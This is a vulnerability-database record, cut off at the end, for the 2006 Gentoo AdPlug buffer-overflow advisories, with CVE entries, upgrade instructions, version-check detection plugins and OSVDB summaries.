{"published": "2006-09-12T00:00:00", "id": "GLSA-200609-06", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2016-09-06T19:46:53", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-3582", "CVE-2006-3581"]}, {"type": "openvas", "idList": ["OPENVAS:57884", "OPENVAS:57850"]}, {"type": "nessus", "idList": ["GENTOO_GLSA-200607-13.NASL", "GENTOO_GLSA-200609-06.NASL"]}, {"type": "gentoo", "idList": ["GLSA-200607-13"]}, {"type": "osvdb", "idList": ["OSVDB:27044", "OSVDB:27047", "OSVDB:27043", "OSVDB:27046", "OSVDB:27042", "OSVDB:27045"]}, {"type": "exploitdb", "idList": ["EDB-ID:28181"]}], "modified": "2016-09-06T19:46:53", "rev": 2}, "vulnersScore": 7.2}, "description": "### Background\n\nAdPlug is a free, cross-platform, and hardware-independent AdLib sound player library. \n\n### Description\n\nAdPlug is vulnerable to buffer and heap overflows when processing the following types of files: CFF, MTK, DMO, U6M, DTM, and S3M. \n\n### Impact\n\nBy enticing a user to load a specially crafted file, an attacker could execute arbitrary code with the privileges of the user running AdPlug. \n\n### Workaround\n\nThere are no known workarounds at this time. 
\n\n### Resolution\n\nAll AdPlug users should update to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-libs/adplug-2.0.1\"", "type": "gentoo", "lastseen": "2016-09-06T19:46:53", "edition": 1, "title": "AdPlug: Multiple vulnerabilities", "href": "https://security.gentoo.org/glsa/200609-06", "modified": "2006-09-12T00:00:00", "bulletinFamily": "unix", "viewCount": 2, "cvelist": ["CVE-2006-3581", "CVE-2006-3582"], "affectedPackage": [{"packageVersion": "2.0.1", "packageName": "media-libs/adplug", "packageFilename": "UNKNOWN", "operator": "lt", "OSVersion": "any", "OS": "Gentoo", "arch": "all"}], "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3582", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3581", "http://www.securityfocus.com/archive/1/439432/30/0/threaded", "https://bugs.gentoo.org/show_bug.cgi?id=139593"], "reporter": "Gentoo Foundation", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:27:22", "description": "Multiple heap-based buffer overflows in Audacious AdPlug 2.0 and earlier allow remote user-assisted attackers to execute arbitrary code via the size specified in the package header of (1) CFF, (2) MTK, (3) DMO, and (4) U6M files.", "edition": 6, "cvss3": {}, "published": "2006-07-13T19:05:00", "title": "CVE-2006-3582", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2006-3582"], "modified": "2018-10-18T16:48:00", "cpe": ["cpe:/a:audacious_media_player_team:adplug:2.0"], "id": "CVE-2006-3582", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3582", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:audacious_media_player_team:adplug:2.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:27:22", "description": "Multiple stack-based buffer overflows in Audacious AdPlug 2.0 and earlier allow remote user-assisted attackers to execute arbitrary code via large (1) DTM and (2) S3M files.", "edition": 6, "cvss3": {}, "published": "2006-07-13T19:05:00", "title": "CVE-2006-3581", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": 
"AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2006-3581"], "modified": "2018-10-18T16:48:00", "cpe": ["cpe:/a:audacious_media_player_team:adplug:2.0"], "id": "CVE-2006-3581", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3581", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:audacious_media_player_team:adplug:2.0:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-24T12:50:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3581", "CVE-2006-3582"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200607-13.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:57850", "href": "http://plugins.openvas.org/nasl.php?oid=57850", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200607-13 (audacious)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The adplug library included in Audacious is vulnerable to various overflows\nthat could result in the execution of arbitrary code.\";\ntag_solution = \"All Audacious users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-sound/audacious-1.1.0'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200607-13\nhttp://bugs.gentoo.org/show_bug.cgi?id=139957\nhttp://www.securityfocus.com/archive/1/439432/30/0/threaded\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200607-13.\";\n\n \n\nif(description)\n{\n script_id(57850);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2006-3581\", \"CVE-2006-3582\");\n script_tag(name:\"cvss_base\", value:\"5.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200607-13 (audacious)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"media-sound/audacious\", unaffected: make_list(\"ge 1.1.0\"), vulnerable: make_list(\"lt 1.1.0\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3581", "CVE-2006-3582"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200609-06.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:57884", "href": "http://plugins.openvas.org/nasl.php?oid=57884", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200609-06 (adplug)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple heap and buffer overflows exist in AdPlug.\";\ntag_solution = \"All AdPlug users should update to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-libs/adplug-2.0.1'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200609-06\nhttp://bugs.gentoo.org/show_bug.cgi?id=139593\nhttp://www.securityfocus.com/archive/1/439432/30/0/threaded\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200609-06.\";\n\n \n\nif(description)\n{\n script_id(57884);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2006-3581\", \"CVE-2006-3582\");\n script_tag(name:\"cvss_base\", value:\"5.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200609-06 (adplug)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"media-libs/adplug\", unaffected: make_list(\"ge 2.0.1\"), vulnerable: make_list(\"lt 2.0.1\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:05", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3581", "CVE-2006-3582"], "description": "### Background\n\nAudacious is a media player that has been forked from Beep Media Player. \n\n### Description\n\nLuigi Auriemma has found that the adplug library fails to verify the size of the destination buffers in the unpacking instructions, resulting in various possible heap and buffer overflows. \n\n### Impact\n\nAn attacker can entice a user to load a specially crafted media file, resulting in a crash or possible execution of arbitrary code. \n\n### Workaround\n\nThere is no known workaround at this time. 
\n\n### Resolution\n\nAll Audacious users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-sound/audacious-1.1.0\"", "edition": 1, "modified": "2006-07-29T00:00:00", "published": "2006-07-29T00:00:00", "id": "GLSA-200607-13", "href": "https://security.gentoo.org/glsa/200607-13", "type": "gentoo", "title": "Audacious: Multiple heap and buffer overflows", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-07T10:52:07", "description": "The remote host is affected by the vulnerability described in GLSA-200609-06\n(AdPlug: Multiple vulnerabilities)\n\n AdPlug is vulnerable to buffer and heap overflows when processing the\n following types of files: CFF, MTK, DMO, U6M, DTM, and S3M.\n \nImpact :\n\n By enticing a user to load a specially crafted file, an attacker could\n execute arbitrary code with the privileges of the user running AdPlug.\n \nWorkaround :\n\n There are no known workarounds at this time.", "edition": 25, "published": "2006-09-15T00:00:00", "title": "GLSA-200609-06 : AdPlug: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3581", "CVE-2006-3582"], "modified": "2006-09-15T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:adplug"], "id": "GENTOO_GLSA-200609-06.NASL", "href": "https://www.tenable.com/plugins/nessus/22351", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200609-06.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22351);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-3581\", \"CVE-2006-3582\");\n script_xref(name:\"GLSA\", value:\"200609-06\");\n\n script_name(english:\"GLSA-200609-06 : AdPlug: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200609-06\n(AdPlug: Multiple vulnerabilities)\n\n AdPlug is vulnerable to buffer and heap overflows when processing the\n following types of files: CFF, MTK, DMO, U6M, DTM, and S3M.\n \nImpact :\n\n By enticing a user to load a specially crafted file, an attacker could\n execute arbitrary code with the privileges of the user running AdPlug.\n \nWorkaround :\n\n There are no known workarounds at this time.\"\n );\n # http://www.securityfocus.com/archive/1/439432/30/0/threaded\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.securityfocus.com/archive/1/439432/30/0/threaded\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200609-06\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All AdPlug users should update to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-libs/adplug-2.0.1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:adplug\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/09/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"media-libs/adplug\", unaffected:make_list(\"ge 2.0.1\"), vulnerable:make_list(\"lt 2.0.1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"AdPlug\");\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:52:06", "description": "The remote host is affected by the vulnerability described in GLSA-200607-13\n(Audacious: Multiple heap and buffer overflows)\n\n Luigi Auriemma has found that the adplug library fails to verify the\n size of the destination buffers in the unpacking instructions,\n resulting in various possible heap and buffer overflows.\n \nImpact :\n\n An attacker can entice a user to load a specially crafted media file,\n resulting in a crash or 
possible execution of arbitrary code.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 25, "published": "2006-08-04T00:00:00", "title": "GLSA-200607-13 : Audacious: Multiple heap and buffer overflows", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3581", "CVE-2006-3582"], "modified": "2006-08-04T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:audacious"], "id": "GENTOO_GLSA-200607-13.NASL", "href": "https://www.tenable.com/plugins/nessus/22142", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200607-13.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22142);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-3581\", \"CVE-2006-3582\");\n script_xref(name:\"GLSA\", value:\"200607-13\");\n\n script_name(english:\"GLSA-200607-13 : Audacious: Multiple heap and buffer overflows\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200607-13\n(Audacious: Multiple heap and buffer overflows)\n\n Luigi Auriemma has found that the adplug library fails to verify the\n size of the destination buffers in the unpacking instructions,\n resulting in various possible heap and buffer overflows.\n \nImpact :\n\n An 
attacker can entice a user to load a specially crafted media file,\n resulting in a crash or possible execution of arbitrary code.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n # http://www.securityfocus.com/archive/1/439432/30/0/threaded\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.securityfocus.com/archive/1/439432/30/0/threaded\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200607-13\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Audacious users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-sound/audacious-1.1.0'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:audacious\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/07/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/08/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"media-sound/audacious\", unaffected:make_list(\"ge 1.1.0\"), vulnerable:make_list(\"lt 1.1.0\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Audacious\");\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:23", "bulletinFamily": "software", "cvelist": ["CVE-2006-3582"], "edition": 1, "description": "## Vulnerability Description\nA local overflow exists in AdPlug. AdPlug fails to handle specially crafted U6M files when unpacking them resulting in a heap overflow. A length value read directly in the header of the U6M file is not properly checked or sanitized when being used to allocate a buffer. A heap overflow could occur while unpacking the file allowing for the execution of arbitrary code.\n## Solution Description\nUpgrade to version CVS 05 Jul 2006 or higher, as it has been reported to fix this vulnerability.\n## Short Description\nA local overflow exists in AdPlug. AdPlug fails to handle specially crafted U6M files when unpacking them resulting in a heap overflow. 
A length value read directly in the header of the U6M file is not properly checked or sanitized when being used to allocate a buffer. A heap overflow could occur while unpacking the file allowing for the execution of arbitrary code.\n## References:\nVendor URL: http://adplug.sourceforge.net/\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200607-13.xml)\n[Secunia Advisory ID:21869](https://secuniaresearch.flexerasoftware.com/advisories/21869/)\n[Secunia Advisory ID:21295](https://secuniaresearch.flexerasoftware.com/advisories/21295/)\n[Secunia Advisory ID:20972](https://secuniaresearch.flexerasoftware.com/advisories/20972/)\n[Secunia Advisory ID:21238](https://secuniaresearch.flexerasoftware.com/advisories/21238/)\n[Related OSVDB ID: 27042](https://vulners.com/osvdb/OSVDB:27042)\n[Related OSVDB ID: 27046](https://vulners.com/osvdb/OSVDB:27046)\n[Related OSVDB ID: 27044](https://vulners.com/osvdb/OSVDB:27044)\n[Related OSVDB ID: 27043](https://vulners.com/osvdb/OSVDB:27043)\n[Related OSVDB ID: 27045](https://vulners.com/osvdb/OSVDB:27045)\nOther Advisory URL: http://aluigi.altervista.org/adv/adplugbof-adv.txt\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200609-06.xml\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0108.html\n[CVE-2006-3582](https://vulners.com/cve/CVE-2006-3582)\n", "modified": "2006-07-06T07:48:59", "published": "2006-07-06T07:48:59", "href": "https://vulners.com/osvdb/OSVDB:27047", "id": "OSVDB:27047", "title": "AdPlug u6m.cpp U6M File Unpacking Overflow", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:23", "bulletinFamily": "software", "cvelist": ["CVE-2006-3582"], "edition": 1, "description": "## Vulnerability Description\nA local overflow exists in AdPlug. AdPlug fails to handle specially crafted CFF files when unpacking them resulting in a heap overflow. 
A length value read directly in the header of the CFF file is not properly checked or sanitized when being used to allocate a buffer. A heap overflow could occur while unpacking the CFF file allowing for the execution of arbitrary code.\n## Solution Description\nUpgrade to version CVS (2006-07-05) or higher, as it has been reported to fix this vulnerability.\n## Short Description\nA local overflow exists in AdPlug. AdPlug fails to handle specially crafted CFF files when unpacking them resulting in a heap overflow. A length value read directly in the header of the CFF file is not properly checked or sanitized when being used to allocate a buffer. A heap overflow could occur while unpacking the CFF file allowing for the execution of arbitrary code.\n## References:\nVendor URL: http://adplug.sourceforge.net/\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200607-13.xml)\n[Secunia Advisory ID:21869](https://secuniaresearch.flexerasoftware.com/advisories/21869/)\n[Secunia Advisory ID:21295](https://secuniaresearch.flexerasoftware.com/advisories/21295/)\n[Secunia Advisory ID:20972](https://secuniaresearch.flexerasoftware.com/advisories/20972/)\n[Secunia Advisory ID:21238](https://secuniaresearch.flexerasoftware.com/advisories/21238/)\n[Related OSVDB ID: 27047](https://vulners.com/osvdb/OSVDB:27047)\n[Related OSVDB ID: 27046](https://vulners.com/osvdb/OSVDB:27046)\n[Related OSVDB ID: 27044](https://vulners.com/osvdb/OSVDB:27044)\n[Related OSVDB ID: 27043](https://vulners.com/osvdb/OSVDB:27043)\n[Related OSVDB ID: 27045](https://vulners.com/osvdb/OSVDB:27045)\nOther Advisory URL: http://aluigi.altervista.org/adv/adplugbof-adv.txt\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200609-06.xml\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0108.html\n[CVE-2006-3582](https://vulners.com/cve/CVE-2006-3582)\n", "modified": "2006-07-06T07:48:59", "published": "2006-07-06T07:48:59", "href": 
"https://vulners.com/osvdb/OSVDB:27042", "id": "OSVDB:27042", "title": "AdPlug cff.cpp CFF File Unpacking Overflow", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:23", "bulletinFamily": "software", "cvelist": ["CVE-2006-3582"], "edition": 1, "description": "## Vulnerability Description\nA local overflow exists in AdPlug. AdPlug fails to handle specially crafted MTK files when unpacking them resulting in a heap overflow. A length value read directly in the header of the MTK file is not properly checked or sanitized when being used to allocate a buffer. A heap overflow could occur while unpacking the file allowing for the execution of arbitrary code.\n## Solution Description\nUpgrade to version CVS (2006-07-05) or higher, as it has been reported to fix this vulnerability.\n## Short Description\nA local overflow exists in AdPlug. AdPlug fails to handle specially crafted MTK files when unpacking them resulting in a heap overflow. A length value read directly in the header of the MTK file is not properly checked or sanitized when being used to allocate a buffer. 
A heap overflow could occur while unpacking the file allowing for the execution of arbitrary code.\n## References:\nVendor URL: http://adplug.sourceforge.net/\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200607-13.xml)\n[Secunia Advisory ID:21869](https://secuniaresearch.flexerasoftware.com/advisories/21869/)\n[Secunia Advisory ID:21295](https://secuniaresearch.flexerasoftware.com/advisories/21295/)\n[Secunia Advisory ID:20972](https://secuniaresearch.flexerasoftware.com/advisories/20972/)\n[Secunia Advisory ID:21238](https://secuniaresearch.flexerasoftware.com/advisories/21238/)\n[Related OSVDB ID: 27042](https://vulners.com/osvdb/OSVDB:27042)\n[Related OSVDB ID: 27047](https://vulners.com/osvdb/OSVDB:27047)\n[Related OSVDB ID: 27046](https://vulners.com/osvdb/OSVDB:27046)\n[Related OSVDB ID: 27044](https://vulners.com/osvdb/OSVDB:27044)\n[Related OSVDB ID: 27045](https://vulners.com/osvdb/OSVDB:27045)\nOther Advisory URL: http://aluigi.altervista.org/adv/adplugbof-adv.txt\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200609-06.xml\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0108.html\n[CVE-2006-3582](https://vulners.com/cve/CVE-2006-3582)\n", "modified": "2006-07-06T07:48:59", "published": "2006-07-06T07:48:59", "href": "https://vulners.com/osvdb/OSVDB:27043", "id": "OSVDB:27043", "title": "AdPlug mtk.cpp MTK File Unpacking Overflow", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:23", "bulletinFamily": 